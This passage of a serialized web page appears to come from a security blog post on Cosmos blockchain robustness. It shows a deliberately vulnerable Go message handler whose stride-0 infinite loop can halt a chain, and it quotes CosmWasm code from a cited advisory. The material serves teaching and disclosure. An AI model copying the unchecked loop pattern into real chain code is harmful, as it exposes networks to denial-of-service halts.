",{"type":25,"tag":216,"props":80037,"children":80038},{"style":6953},[80039],{"type":31,"value":266},{"type":25,"tag":216,"props":80041,"children":80042},{"style":6964},[80043],{"type":31,"value":80044}," arr.length;\n",{"type":25,"tag":216,"props":80046,"children":80047},{"class":6922,"line":7275},[80048],{"type":25,"tag":216,"props":80049,"children":80050},{"emptyLinePlaceholder":16},[80051],{"type":31,"value":7642},{"type":25,"tag":216,"props":80053,"children":80054},{"class":6922,"line":7296},[80055,80059,80064,80068],{"type":25,"tag":216,"props":80056,"children":80057},{"style":6973},[80058],{"type":31,"value":68342},{"type":25,"tag":216,"props":80060,"children":80061},{"style":6964},[80062],{"type":31,"value":80063}," (idx ",{"type":25,"tag":216,"props":80065,"children":80066},{"style":6953},[80067],{"type":31,"value":9757},{"type":25,"tag":216,"props":80069,"children":80070},{"style":6964},[80071],{"type":31,"value":80072}," end) {\n",{"type":25,"tag":216,"props":80074,"children":80075},{"class":6922,"line":7305},[80076,80081,80085],{"type":25,"tag":216,"props":80077,"children":80078},{"style":6964},[80079],{"type":31,"value":80080},"        sum ",{"type":25,"tag":216,"props":80082,"children":80083},{"style":6953},[80084],{"type":31,"value":72407},{"type":25,"tag":216,"props":80086,"children":80087},{"style":6964},[80088],{"type":31,"value":80089}," arr[idx];\n",{"type":25,"tag":216,"props":80091,"children":80092},{"class":6922,"line":7557},[80093,80098,80102],{"type":25,"tag":216,"props":80094,"children":80095},{"style":6964},[80096],{"type":31,"value":80097},"        idx ",{"type":25,"tag":216,"props":80099,"children":80100},{"style":6953},[80101],{"type":31,"value":72407},{"type":25,"tag":216,"props":80103,"children":80104},{"style":6964},[80105],{"type":31,"value":80106}," stride;\n",{"type":25,"tag":216,"props":80108,"children":80109},{"class":6922,"line":7574},[80110],{"type":25,"tag":216,"props":80111,"children":80112},{"style":6964},[80113],{"type":31,"value":7311},{"type":25,"tag":216,"props":80115,"children":80116},{"class":6922,"line":7591},[80117,80121],{"type":25,"tag":216,"props":80118,"children":80119},{"style":6973},[80120],{"type":31,"value":20947},{"type":25,"tag":216,"props":80122,"children":80123},{"style":6964},[80124],{"type":31,"value":80125}," sum;\n",{"type":25,"tag":216,"props":80127,"children":80128},{"class":6922,"line":7604},[80129],{"type":25,"tag":216,"props":80130,"children":80131},{"style":6964},[80132],{"type":31,"value":7874},{"type":25,"tag":206,"props":80134,"children":80138},{"code":80135,"language":80136,"meta":7,"className":80137,"style":7},"type MsgSumWithStrideParams struct {\n    Start uint64\n    Stride uint64\n    Arr []uint64\n}\n\ntype MsgSumWithStrideResponse struct {\n    Sum uint64\n}\n\nfunc (ms msgServer) SumWithStride(\n    goCtx context.Context,\n    msg *MsgSumWithStrideParams,\n) (*MsgSumWithStrideResponse, error) {\n    sum := uint64(0)\n    end := uint64(len(msg.Arr))\n    for idx := msg.Start; idx \u003C end; idx += msg.Stride {\n        sum += msg.Arr[idx]\n    }\n    return &MsgSumWithStrideResponse{Sum: sum}, nil\n}\n","go","language-go shiki shiki-themes slack-dark",[80139],{"type":25,"tag":82,"props":80140,"children":80141},{"__ignoreMap":7},[80142,80162,80175,80187,80205,80212,80219,80239,80251,80258,80265,80300,80326,80347,80376,80406,80451,80528,80564,80571,80615],{"type":25,"tag":216,"props":80143,"children":80144},{"class":6922,"line":6923},[80145,80149,80154,80158],{"type":25,"tag":216,"props":80146,"children":80147},{"style":6936},[80148],{"type":31,"value":36719},{"type":25,"tag":216,"props":80150,"children":80151},{"style":7375},[80152],{"type":31,"value":80153}," MsgSumWithStrideParams",{"type":25,"tag":216,"props":80155,"children":80156},{"style":6936},[80157],{"type":31,"value":25111},{"type":25,"tag":216,"props":80159,"children":80160},{"style":6964},[80161],{"type":31,"value":7241},{"type":25,"tag":216,"props":80163,"children":80164},{"class":6922,"line":6769},[80165,80170],{"type":25,"tag":216,"props":80166,"children":80167},{"style":6947},[80168],{"type":31,"value":80169},"    Start",{"type":25,"tag":216,"props":80171,"children":80172},{"style":7375},[80173],{"type":31,"value":80174}," uint64\n",{"type":25,"tag":216,"props":80176,"children":80177},{"class":6922,"line":6778},[80178,80183],{"type":25,"tag":216,"props":80179,"children":80180},{"style":6947},[80181],{"type":31,"value":80182},"    Stride",{"type":25,"tag":216,"props":80184,"children":80185},{"style":7375},[80186],{"type":31,"value":80174},{"type":25,"tag":216,"props":80188,"children":80189},{"class":6922,"line":7005},[80190,80195,80200],{"type":25,"tag":216,"props":80191,"children":80192},{"style":6947},[80193],{"type":31,"value":80194},"    Arr",{"type":25,"tag":216,"props":80196,"children":80197},{"style":6964},[80198],{"type":31,"value":80199}," []",{"type":25,"tag":216,"props":80201,"children":80202},{"style":7375},[80203],{"type":31,"value":80204},"uint64\n",{"type":25,"tag":216,"props":80206,"children":80207},{"class":6922,"line":7110},[80208],{"type":25,"tag":216,"props":80209,"children":80210},{"style":6964},[80211],{"type":31,"value":7874},{"type":25,"tag":216,"props":80213,"children":80214},{"class":6922,"line":7216},[80215],{"type":25,"tag":216,"props":80216,"children":80217},{"emptyLinePlaceholder":16},[80218],{"type":31,"value":7642},{"type":25,"tag":216,"props":80220,"children":80221},{"class":6922,"line":7244},[80222,80226,80231,80235],{"type":25,"tag":216,"props":80223,"children":80224},{"style":6936},[80225],{"type":31,"value":36719},{"type":25,"tag":216,"props":80227,"children":80228},{"style":7375},[80229],{"type":31,"value":80230}," MsgSumWithStrideResponse",{"type":25,"tag":216,"props":80232,"children":80233},{"style":6936},[80234],{"type":31,"value":25111},{"type":25,"tag":216,"props":80236,"children":80237},{"style":6964},[80238],{"type":31,"value":7241},{"type":25,"tag":216,"props":80240,"children":80241},{"class":6922,"line":7257},[80242,80247],{"type":25,"tag":216,"props":80243,"children":80244},{"style":6947},[80245],{"type":31,"value":80246},"    Sum",{"type":25,"tag":216,"props":80248,"children":80249},{"style":7375},[80250],{"type":31,"value":80174},{"type":25,"tag":216,"props":80252,"children":80253},{"class":6922,"line":7275},[80254],{"type":25,"tag":216,"props":80255,"children":80256},{"style":6964},[80257],{"type":31,"value":7874},{"type":25,"tag":216,"props":80259,"children":80260},{"class":6922,"line":7296},[80261],{"type":25,"tag":216,"props":80262,"children":80263},{"emptyLinePlaceholder":16},[80264],{"type":31,"value":7642},{"type":25,"tag":216,"props":80266,"children":80267},{"class":6922,"line":7305},[80268,80273,80277,80282,80287,80291,80296],{"type":25,"tag":216,"props":80269,"children":80270},{"style":6936},[80271],{"type":31,"value":80272},"func",{"type":25,"tag":216,"props":80274,"children":80275},{"style":6964},[80276],{"type":31,"value":7016},{"type":25,"tag":216,"props":80278,"children":80279},{"style":6947},[80280],{"type":31,"value":80281},"ms ",{"type":25,"tag":216,"props":80283,"children":80284},{"style":7375},[80285],{"type":31,"value":80286},"msgServer",{"type":25,"tag":216,"props":80288,"children":80289},{"style":6964},[80290],{"type":31,"value":7036},{"type":25,"tag":216,"props":80292,"children":80293},{"style":7047},[80294],{"type":31,"value":80295},"SumWithStride",{"type":25,"tag":216,"props":80297,"children":80298},{"style":6964},[80299],{"type":31,"value":7420},{"type":25,"tag":216,"props":80301,"children":80302},{"class":6922,"line":7557},[80303,80308,80313,80317,80322],{"type":25,"tag":216,"props":80304,"children":80305},{"style":6947},[80306],{"type":31,"value":80307},"    goCtx",{"type":25,"tag":216,"props":80309,"children":80310},{"style":7375},[80311],{"type":31,"value":80312}," context",{"type":25,"tag":216,"props":80314,"children":80315},{"style":6964},[80316],{"type":31,"value":179},{"type":25,"tag":216,"props":80318,"children":80319},{"style":7375},[80320],{"type":31,"value":80321},"Context",{"type":25,"tag":216,"props":80323,"children":80324},{"style":6964},[80325],{"type":31,"value":7465},{"type":25,"tag":216,"props":80327,"children":80328},{"class":6922,"line":7574},[80329,80334,80338,80343],{"type":25,"tag":216,"props":80330,"children":80331},{"style":6947},[80332],{"type":31,"value":80333},"    msg",{"type":25,"tag":216,"props":80335,"children":80336},{"style":6953},[80337],{"type":31,"value":13773},{"type":25,"tag":216,"props":80339,"children":80340},{"style":7375},[80341],{"type":31,"value":80342},"MsgSumWithStrideParams",{"type":25,"tag":216,"props":80344,"children":80345},{"style":6964},[80346],{"type":31,"value":7465},{"type":25,"tag":216,"props":80348,"children":80349},{"class":6922,"line":7591},[80350,80355,80359,80364,80368,80372],{"type":25,"tag":216,"props":80351,"children":80352},{"style":6964},[80353],{"type":31,"value":80354},") (",{"type":25,"tag":216,"props":80356,"children":80357},{"style":6953},[80358],{"type":31,"value":8519},{"type":25,"tag":216,"props":80360,"children":80361},{"style":7375},[80362],{"type":31,"value":80363},"MsgSumWithStrideResponse",{"type":25,"tag":216,"props":80365,"children":80366},{"style":6964},[80367],{"type":31,"value":7026},{"type":25,"tag":216,"props":80369,"children":80370},{"style":7375},[80371],{"type":31,"value":18821},{"type":25,"tag":216,"props":80373,"children":80374},{"style":6964},[80375],{"type":31,"value":18761},{"type":25,"tag":216,"props":80377,"children":80378},{"class":6922,"line":7604},[80379,80384,80389,80394,80398,80402],{"type":25,"tag":216,"props":80380,"children":80381},{"style":6947},[80382],{"type":31,"value":80383},"    sum",{"type":25,"tag":216,"props":80385,"children":80386},{"style":6953},[80387],{"type":31,"value":80388}," :=",{"type":25,"tag":216,"props":80390,"children":80391},{"style":7375},[80392],{"type":31,"value":80393}," uint64",{"type":25,"tag":216,"props":80395,"children":80396},{"style":6964},[80397],{"type":31,"value":1850},{"type":25,"tag":216,"props":80399,"children":80400},{"style":6989},[80401],{"type":31,"value":1882},{"type":25,"tag":216,"props":80403,"children":80404},{"style":6964},[80405],{"type":31,"value":7107},{"type":25,"tag":216,"props":80407,"children":80408},{"class":6922,"line":7613},[80409,80414,80418,80422,80426,80430,80434,80438,80442,80447],{"type":25,"tag":216,"props":80410,"children":80411},{"style":6947},[80412],{"type":31,"value":80413},"    end",{"type":25,"tag":216,"props":80415,"children":80416},{"style":6953},[80417],{"type":31,"value":80388},{"type":25,"tag":216,"props":80419,"children":80420},{"style":7375},[80421],{"type":31,"value":80393},{"type":25,"tag":216,"props":80423,"children":80424},{"style":6964},[80425],{"type":31,"value":1850},{"type":25,"tag":216,"props":80427,"children":80428},{"style":7047},[80429],{"type":31,"value":13094},{"type":25,"tag":216,"props":80431,"children":80432},{"style":6964},[80433],{"type":31,"value":1850},{"type":25,"tag":216,"props":80435,"children":80436},{"style":6947},[80437],{"type":31,"value":61914},{"type":25,"tag":216,"props":80439,"children":80440},{"style":6964},[80441],{"type":31,"value":179},{"type":25,"tag":216,"props":80443,"children":80444},{"style":6947},[80445],{"type":31,"value":80446},"Arr",{"type":25,"tag":216,"props":80448,"children":80449},{"style":6964},[80450],{"type":31,"value":23672},{"type":25,"tag":216,"props":80452,"children":80453},{"class":6922,"line":7636},[80454,80458,80463,80467,80472,80476,80481,80485,80490,80494,80499,80503,80507,80511,80515,80519,80524],{"type":25,"tag":216,"props":80455,"children":80456},{"style":6973},[80457],{"type":31,"value":6976},{"type":25,"tag":216,"props":80459,"children":80460},{"style":6947},[80461],{"type":31,"value":80462}," idx",{"type":25,"tag":216,"props":80464,"children":80465},{"style":6953},[80466],{"type":31,"value":80388},{"type":25,"tag":216,"props":80468,"children":80469},{"style":6947},[80470],{"type":31,"value":80471}," msg",{"type":25,"tag":216,"props":80473,"children":80474},{"style":6964},[80475],{"type":31,"value":179},{"type":25,"tag":216,"props":80477,"children":80478},{"style":6947},[80479],{"type":31,"value":80480},"Start",{"type":25,"tag":216,"props":80482,"children":80483},{"style":6964},[80484],{"type":31,"value":21184},{"type":25,"tag":216,"props":80486,"children":80487},{"style":6947},[80488],{"type":31,"value":80489},"idx",{"type":25,"tag":216,"props":80491,"children":80492},{"style":6953},[80493],{"type":31,"value":12672},{"type":25,"tag":216,"props":80495,"children":80496},{"style":6947},[80497],{"type":31,"value":80498}," end",{"type":25,"tag":216,"props":80500,"children":80501},{"style":6964},[80502],{"type":31,"value":21184},{"type":25,"tag":216,"props":80504,"children":80505},{"style":6947},[80506],{"type":31,"value":80489},{"type":25,"tag":216,"props":80508,"children":80509},{"style":6953},[80510],{"type":31,"value":19022},{"type":25,"tag":216,"props":80512,"children":80513},{"style":6947},[80514],{"type":31,"value":80471},{"type":25,"tag":216,"props":80516,"children":80517},{"style":6964},[80518],{"type":31,"value":179},{"type":25,"tag":216,"props":80520,"children":80521},{"style":6947},[80522],{"type":31,"value":80523},"Stride",{"type":25,"tag":216,"props":80525,"children":80526},{"style":6964},[80527],{"type":31,"value":7241},{"type":25,"tag":216,"props":80529,"children":80530},{"class":6922,"line":7645},[80531,80536,80540,80544,80548,80552,80556,80560],{"type":25,"tag":216,"props":80532,"children":80533},{"style":6947},[80534],{"type":31,"value":80535},"        sum",{"type":25,"tag":216,"props":80537,"children":80538},{"style":6953},[80539],{"type":31,"value":19022},{"type":25,"tag":216,"props":80541,"children":80542},{"style":6947},[80543],{"type":31,"value":80471},{"type":25,"tag":216,"props":80545,"children":80546},{"style":6964},[80547],{"type":31,"value":179},{"type":25,"tag":216,"props":80549,"children":80550},{"style":6947},[80551],{"type":31,"value":80446},{"type":25,"tag":216,"props":80553,"children":80554},{"style":6964},[80555],{"type":31,"value":7701},{"type":25,"tag":216,"props":80557,"children":80558},{"style":6947},[80559],{"type":31,"value":80489},{"type":25,"tag":216,"props":80561,"children":80562},{"style":6964},[80563],{"type":31,"value":15728},{"type":25,"tag":216,"props":80565,"children":80566},{"class":6922,"line":7654},[80567],{"type":25,"tag":216,"props":80568,"children":80569},{"style":6964},[80570],{"type":31,"value":7311},{"type":25,"tag":216,"props":80572,"children":80573},{"class":6922,"line":7722},[80574,80578,80582,80586,80591,80596,80600,80605,80610],{"type":25,"tag":216,"props":80575,"children":80576},{"style":6973},[80577],{"type":31,"value":20947},{"type":25,"tag":216,"props":80579,"children":80580},{"style":6953},[80581],{"type":31,"value":11093},{"type":25,"tag":216,"props":80583,"children":80584},{"style":7375},[80585],{"type":31,"value":80363},{"type":25,"tag":216,"props":80587,"children":80588},{"style":6964},[80589],{"type":31,"value":80590},"{",{"type":25,"tag":216,"props":80592,"children":80593},{"style":6947},[80594],{"type":31,"value":80595},"Sum",{"type":25,"tag":216,"props":80597,"children":80598},{"style":6964},[80599],{"type":31,"value":19288},{"type":25,"tag":216,"props":80601,"children":80602},{"style":6947},[80603],{"type":31,"value":80604},"sum",{"type":25,"tag":216,"props":80606,"children":80607},{"style":6964},[80608],{"type":31,"value":80609},"}, ",{"type":25,"tag":216,"props":80611,"children":80612},{"style":6936},[80613],{"type":31,"value":80614},"nil\n",{"type":25,"tag":216,"props":80616,"children":80617},{"class":6922,"line":7730},[80618],{"type":25,"tag":216,"props":80619,"children":80620},{"style":6964},[80621],{"type":31,"value":7874},{"type":25,"tag":38,"props":80623,"children":80624},{},[80625,80627,80632,80633,80639],{"type":31,"value":80626},"The provided Solidity / Cosmos snippets feature a public function that calculates the sums of an array using a provided starting ",{"type":25,"tag":82,"props":80628,"children":80630},{"className":80629},[],[80631],{"type":31,"value":80489},{"type":31,"value":11266},{"type":25,"tag":82,"props":80634,"children":80636},{"className":80635},[],[80637],{"type":31,"value":80638},"stride",{"type":31,"value":80640},". It is crucial to note that this function lacks robustness. A keen observer might have already identified that if the user supplies a stride value of 0, the code will result in an infinite loop.",{"type":25,"tag":38,"props":80642,"children":80643},{},[80644],{"type":31,"value":80645},"While an infinite loop is not ideal for Solidity, it may still be tolerable. The underlying blockchain on which a smart contract operates is responsible for monitoring the gas and computation budget. It will intervene and terminate the execution at a certain point. Interestingly, those types of \"unhandled error\" patterns are quite common occurrences in contracts.",{"type":25,"tag":38,"props":80647,"children":80648},{},[80649],{"type":31,"value":80650},"However, the same logic does not directly apply to Cosmos. In Cosmos, users are responsible for implementing the entire L1, and there is no underlying computation budget tracker that automatically stops code execution. As a result, any potential logic DoS or infinite loop can directly lead to the custom Cosmos L1 chain halting or stalling.",{"type":25,"tag":38,"props":80652,"children":80653},{},[80654],{"type":31,"value":80655},"This toy scenario captures the importance of attention to error handling, edge cases, and overall robustness in Cosmos.",{"type":25,"tag":606,"props":80657,"children":80659},{"id":80658},"real-world-examples",[80660],{"type":31,"value":80661},"Real-World Examples",{"type":25,"tag":38,"props":80663,"children":80664},{},[80665],{"type":31,"value":80666},"Now, let's examine a few real-world instances.",{"type":25,"tag":38,"props":80668,"children":80669},{},[80670,80672,80678,80679,80685,80687,80693,80695,80701],{"type":31,"value":80671},"In the case of ",{"type":25,"tag":162,"props":80673,"children":80676},{"href":80674,"rel":80675},"https://github.com/JumpCrypto/security-research/blob/e900a400f763075bdae161f4fd6e36d70da1d844/advisories/2023-003-cosmwasm.md",[166],[80677],{"type":31,"value":21651},{"type":31,"value":10409},{"type":25,"tag":82,"props":80680,"children":80682},{"className":80681},[],[80683],{"type":31,"value":80684},"CosmWasm",{"type":31,"value":80686}," bug, the helper method ",{"type":25,"tag":82,"props":80688,"children":80690},{"className":80689},[],[80691],{"type":31,"value":80692},"write_to_contract",{"type":31,"value":80694}," negligently calls the untrusted Wasm function ",{"type":25,"tag":82,"props":80696,"children":80698},{"className":80697},[],[80699],{"type":31,"value":80700},"\"allocate\"",{"type":31,"value":179},{"type":25,"tag":38,"props":80703,"children":80704},{},[80705],{"type":25,"tag":162,"props":80706,"children":80709},{"href":80707,"rel":80708},"https://github.com/CosmWasm/cosmwasm/blob/db426f9b15eabf18359df62878847bbaa7cb85ef/packages/vm/src/imports.rs#L409",[166],[80710],{"type":31,"value":80711},"Permalink for snippet",{"type":25,"tag":206,"props":80713,"children":80715},{"code":80714,"language":6914,"meta":7,"className":6915,"style":7},"fn write_to_contract\u003CA: BackendApi, S: Storage, Q: Querier>(\n    env: &Environment\u003CA, S, Q>,\n    input: &[u8],\n) -> VmResult\u003Cu32> {\n    let out_size = to_u32(input.len())?;\n    let result = env.call_function1(\"allocate\", &[out_size.into()])?;\n    let target_ptr = ref_to_u32(&result)?;\n    if target_ptr == 0 {\n        return Err(CommunicationError::zero_address().into());\n    }\n    write_region(&env.memory(), target_ptr, input)?;\n    Ok(target_ptr)\n}\n",[80716],{"type":25,"tag":82,"props":80717,"children":80718},{"__ignoreMap":7},[80719,80788,80836,80864,80893,80942,81016,81061,81084,81129,81136,81193,81212],{"type":25,"tag":216,"props":80720,"children":80721},{"class":6922,"line":6923},[80722,80726,80731,80735,80740,80744,80749,80753,80757,80761,80766,80770,80775,80779,80784],{"type":25,"tag":216,"props":80723,"children":80724},{"style":6936},[80725],{"type":31,"value":24226},{"type":25,"tag":216,"props":80727,"children":80728},{"style":7047},[80729],{"type":31,"value":80730}," write_to_contract",{"type":25,"tag":216,"props":80732,"children":80733},{"style":6964},[80734],{"type":31,"value":9757},{"type":25,"tag":216,"props":80736,"children":80737},{"style":7375},[80738],{"type":31,"value":80739},"A",{"type":25,"tag":216,"props":80741,"children":80742},{"style":6953},[80743],{"type":31,"value":1472},{"type":25,"tag":216,"props":80745,"children":80746},{"style":7375},[80747],{"type":31,"value":80748}," BackendApi",{"type":25,"tag":216,"props":80750,"children":80751},{"style":6964},[80752],{"type":31,"value":7026},{"type":25,"tag":216,"props":80754,"children":80755},{"style":7375},[80756],{"type":31,"value":5272},{"type":25,"tag":216,"props":80758,"children":80759},{"style":6953},[80760],{"type":31,"value":1472},{"type":25,"tag":216,"props":80762,"children":80763},{"style":7375},[80764],{"type":31,"value":80765}," Storage",{"type":25,"tag":216,"props":80767,"children":80768},{"style":6964},[80769],{"type":31,"value":7026},{"type":25,"tag":216,"props":80771,"children":80772},{"style":7375},[80773],{"type":31,"value":80774},"Q",{"type":25,"tag":216,"props":80776,"children":80777},{"style":6953},[80778],{"type":31,"value":1472},{"type":25,"tag":216,"props":80780,"children":80781},{"style":7375},[80782],{"type":31,"value":80783}," Querier",{"type":25,"tag":216,"props":80785,"children":80786},{"style":6964},[80787],{"type":31,"value":10540},{"type":25,"tag":216,"props":80789,"children":80790},{"class":6922,"line":6769},[80791,80795,80799,80803,80808,80812,80816,80820,80824,80828,80832],{"type":25,"tag":216,"props":80792,"children":80793},{"style":6947},[80794],{"type":31,"value":7814},{"type":25,"tag":216,"props":80796,"children":80797},{"style":6953},[80798],{"type":31,"value":1472},{"type":25,"tag":216,"props":80800,"children":80801},{"style":6953},[80802],{"type":31,"value":11093},{"type":25,"tag":216,"props":80804,"children":80805},{"style":7375},[80806],{"type":31,"value":80807},"Environment",{"type":25,"tag":216,"props":80809,"children":80810},{"style":6964},[80811],{"type":31,"value":9757},{"type":25,"tag":216,"props":80813,"children":80814},{"style":7375},[80815],{"type":31,"value":80739},{"type":25,"tag":216,"props":80817,"children":80818},{"style":6964},[80819],{"type":31,"value":7026},{"type":25,"tag":216,"props":80821,"children":80822},{"style":7375},[80823],{"type":31,"value":5272},{"type":25,"tag":216,"props":80825,"children":80826},{"style":6964},[80827],{"type":31,"value":7026},{"type":25,"tag":216,"props":80829,"children":80830},{"style":7375},[80831],{"type":31,"value":80774},{"type":25,"tag":216,"props":80833,"children":80834},{"style":6964},[80835],{"type":31,"value":10089},{"type":25,"tag":216,"props":80837,"children":80838},{"class":6922,"line":6778},[80839,80844,80848,80852,80856,80860],{"type":25,"tag":216,"props":80840,"children":80841},{"style":6947},[80842],{"type":31,"value":80843},"    input",{"type":25,"tag":216,"props":80845,"children":80846},{"style":6953},[80847],{"type":31,"value":1472},{"type":25,"tag":216,"props":80849,"children":80850},{"style":6953},[80851],{"type":31,"value":11093},{"type":25,"tag":216,"props":80853,"children":80854},{"style":6964},[80855],{"type":31,"value":7701},{"type":25,"tag":216,"props":80857,"children":80858},{"style":7375},[80859],{"type":31,"value":7378},{"type":25,"tag":216,"props":80861,"children":80862},{"style":6964},[80863],{"type":31,"value":18220},{"type":25,"tag":216,"props":80865,"children":80866},{"class":6922,"line":7005},[80867,80871,80875,80880,80884,80889],{"type":25,"tag":216,"props":80868,"children":80869},{"style":6964},[80870],{"type":31,"value":7036},{"type":25,"tag":216,"props":80872,"children":80873},{"style":6953},[80874],{"type":31,"value":17714},{"type":25,"tag":216,"props":80876,"children":80877},{"style":7375},[80878],{"type":31,"value":80879}," VmResult",{"type":25,"tag":216,"props":80881,"children":80882},{"style":6964},[80883],{"type":31,"value":9757},{"type":25,"tag":216,"props":80885,"children":80886},{"style":7375},[80887],{"type":31,"value":80888},"u32",{"type":25,"tag":216,"props":80890,"children":80891},{"style":6964},[80892],{"type":31,"value":11233},{"type":25,"tag":216,"props":80894,"children":80895},{"class":6922,"line":7110},[80896,80900,80905,80909,80914,80918,80922,80926,80930,80934,80938],{"type":25,"tag":216,"props":80897,"children":80898},{"style":6936},[80899],{"type":31,"value":6939},{"type":25,"tag":216,"props":80901,"children":80902},{"style":6947},[80903],{"type":31,"value":80904}," out_size",{"type":25,"tag":216,"props":80906,"children":80907},{"style":6953},[80908],{"type":31,"value":6956},{"type":25,"tag":216,"props":80910,"children":80911},{"style":7047},[80912],{"type":31,"value":80913}," to_u32",{"type":25,"tag":216,"props":80915,"children":80916},{"style":6964},[80917],{"type":31,"value":1850},{"type":25,"tag":216,"props":80919,"children":80920},{"style":6947},[80921],{"type":31,"value":12319},{"type":25,"tag":216,"props":80923,"children":80924},{"style":6953},[80925],{"type":31,"value":179},{"type":25,"tag":216,"props":80927,"children":80928},{"style":7047},[80929],{"type":31,"value":13094},{"type":25,"tag":216,"props":80931,"children":80932},{"style":6964},[80933],{"type":31,"value":45929},{"type":25,"tag":216,"props":80935,"children":80936},{"style":6953},[80937],{"type":31,"value":604},{"type":25,"tag":216,"props":80939,"children":80940},{"style":6964},[80941],{"type":31,"value":6967},{"type":25,"tag":216,"props":80943,"children":80944},{"class":6922,"line":7216},[80945,80949,80953,80957,80961,80965,80970,80974,80978,80982,80986,80990,80995,80999,81003,81008,81012],{"type":25,"tag":216,"props":80946,"children":80947},{"style":6936},[80948],{"type":31,"value":6939},{"type":25,"tag":216,"props":80950,"children":80951},{"style":6947},[80952],{"type":31,"value":13115},{"type":25,"tag":216,"props":80954,"children":80955},{"style":6953},[80956],{"type":31,"value":6956},{"type":25,"tag":216,"props":80958,"children":80959},{"style":6947},[80960],{"type":31,"value":46923},{"type":25,"tag":216,"props":80962,"children":80963},{"style":6953},[80964],{"type":31,"value":179},{"type":25,"tag":216,"props":80966,"children":80967},{"style":7047},[80968],{"type":31,"value":80969},"call_function1",{"type":25,"tag":216,"props":80971,"children":80972},{"style":6964},[80973],{"type":31,"value":1850},{"type":25,"tag":216,"props":80975,"children":80976},{"style":8205},[80977],{"type":31,"value":80700},{"type":25,"tag":216,"props":80979,"children":80980},{"style":6964},[80981],{"type":31,"value":7026},{"type":25,"tag":216,"props":80983,"children":80984},{"style":6953},[80985],{"type":31,"value":7059},{"type":25,"tag":216,"props":80987,"children":80988},{"style":6964},[80989],{"type":31,"value":7701},{"type":25,"tag":216,"props":80991,"children":80992},{"style":6947},[80993],{"type":31,"value":80994},"out_size",{"type":25,"tag":216,"props":80996,"children":80997},{"style":6953},[80998],{"type":31,"value":179},{"type":25,"tag":216,"props":81000,"children":81001},{"style":7047},[81002],{"type":31,"value":18843},{"type":25,"tag":216,"props":81004,"children":81005},{"style":6964},[81006],{"type":31,"value":81007},"()])",{"type":25,"tag":216,"props":81009,"children":81010},{"style":6953},[81011],{"type":31,"value":604},{"type":25,"tag":216,"props":81013,"children":81014},{"style":6964},[81015],{"type":31,"value":6967},{"type":25,"tag":216,"props":81017,"children":81018},{"class":6922,"line":7244},[81019,81023,81028,81032,81037,81041,81045,81049,81053,81057],{"type":25,"tag":216,"props":81020,"children":81021},{"style":6936},[81022],{"type":31,"value":6939},{"type":25,"tag":216,"props":81024,"children":81025},{"style":6947},[81026],{"type":31,"value":81027}," target_ptr",{"type":25,"tag":216,"props":81029,"children":81030},{"style":6953},[81031],{"type":31,"value":6956},{"type":25,"tag":216,"props":81033,"children":81034},{"style":7047},[81035],{"type":31,"value":81036}," ref_to_u32",{"type":25,"tag":216,"props":81038,"children":81039},{"style":6964},[81040],{"type":31,"value":1850},{"type":25,"tag":216,"props":81042,"children":81043},{"style":6953},[81044],{"type":31,"value":7059},{"type":25,"tag":216,"props":81046,"children":81047},{"style":6947},[81048],{"type":31,"value":13037},{"type":25,"tag":216,"props":81050,"children":81051},{"style":6964},[81052],{"type":31,"value":1888},{"type":25,"tag":216,"props":81054,"children":81055},{"style":6953},[81056],{"type":31,"value":604},{"type":25,"tag":216,"props":81058,"children":81059},{"style":6964},[81060],{"type":31,"value":6967},{"type":25,"tag":216,"props":81062,"children":81063},{"class":6922,"line":7257},[81064,81068,81072,81076,81080],{"type":25,"tag":216,"props":81065,"children":81066},{"style":6973},[81067],{"type":31,"value":16235},{"type":25,"tag":216,"props":81069,"children":81070},{"style":6947},[81071],{"type":31,"value":81027},{"type":25,"tag":216,"props":81073,"children":81074},{"style":6953},[81075],{"type":31,"value":7232},{"type":25,"tag":216,"props":81077,"children":81078},{"style":6989},[81079],{"type":31,"value":6992},{"type":25,"tag":216,"props":81081,"children":81082},{"style":6964},[81083],{"type":31,"value":7241},{"type":25,"tag":216,"props":81085,"children":81086},{"class":6922,"line":7275},[81087,81091,81095,81099,81104,81108,81113,81117,81121,81125],{"type":25,"tag":216,"props":81088,"children":81089},{"style":6973},[81090],{"type":31,"value":19702},{"type":25,"tag":216,"props":81092,"children":81093},{"style":7375},[81094],{"type":31,"value":19707},{"type":25,"tag":216,"props":81096,"children":81097},{"style":6964},[81098],{"type":31,"value":1850},{"type":25,"tag":216,"props":81100,"children":81101},{"style":7375},[81102],{"type":31,"value":81103},"CommunicationError",{"type":25,"tag":216,"props":81105,"children":81106},{"style":6953},[81107],{"type":31,"value":7438},{"type":25,"tag":216,"props":81109,"children":81110},{"style":7047},[81111],{"type":31,"value":81112},"zero_address",{"type":25,"tag":216,"props":81114,"children":81115},{"style":6964},[81116],{"type":31,"value":17836},{"type":25,"tag":216,"props":81118,"children":81119},{"style":6953},[81120],{"type":31,"value":179},{"type":25,"tag":216,"props":81122,"children":81123},{"style":7047},[81124],{"type":31,"value":18843},{"type":25,"tag":216,"props":81126,"children":81127},{"style":6964},[81128],{"type":31,"value":19382},{"type":25,"tag":216,"props":81130,"children":81131},{"class":6922,"line":7296},[81132],{"type":25,"tag":216,"props":81133,"children":81134},{"style":6964},[81135],{"type":31,"value":7311},{"type":25,"tag":216,"props":81137,"children":81138},{"class":6922,"line":7305},[81139,81144,81148,81152,81156,81160,81164,81168,81173,81177,81181,81185,81189],{"type":25,"tag":216,"props":81140,"children":81141},{"style":7047},[81142],{"type":31,"value":81143},"    write_region",{"type":25,"tag":216,"props":81145,"children":81146},{"style":6964},[81147],{"type":31,"value":1850},{"type":25,"tag":216,"props":81149,"children":81150},{"style":6953},[81151],{"type":31,"value":7059},{"type":25,"tag":216,"props":81153,"children":81154},{"style":6947},[81155],{"type":31,"value":39653},{"type":25,"tag":216,"props":81157,"children":81158},{"style":6953},[81159],{"type":31,"value":179},{"type":25,"tag":216,"props":81161,"children":81162},{"style":7047},[81163],{"type":31,"value":79944},{"type":25,"tag":216,"props":81165,"children":81166},{"style":6964},[81167],{"type":31,"value":22334},{"type":25,"tag":216,"props":81169,"children":81170},{"style":6947},[81171],{"type":31,"value":81172},"target_ptr",{"type":25,"tag":216,"props":81174,"children":81175},{"style":6964},[81176],{"type":31,"value":7026},{"type":25,"tag":216,"props":81178,"children":81179},{"style":6947},[81180],{"type":31,"value":12319},{"type":25,"tag":216,"props":81182,"children":81183},{"style":6964},[81184],{"type":31,"value":1888},{"type":25,"tag":216,"props":81186,"children":81187},{"style":6953},[81188],{"type":31,"value":604},{"type":25,"tag":216,"props":81190,"children":81191},{"style":6964},[81192],{"type":31,"value":6967},{"type":25,"tag":216,"props":81194,"children":81195},{"class":6922,"line":7557},[81196,81200,8120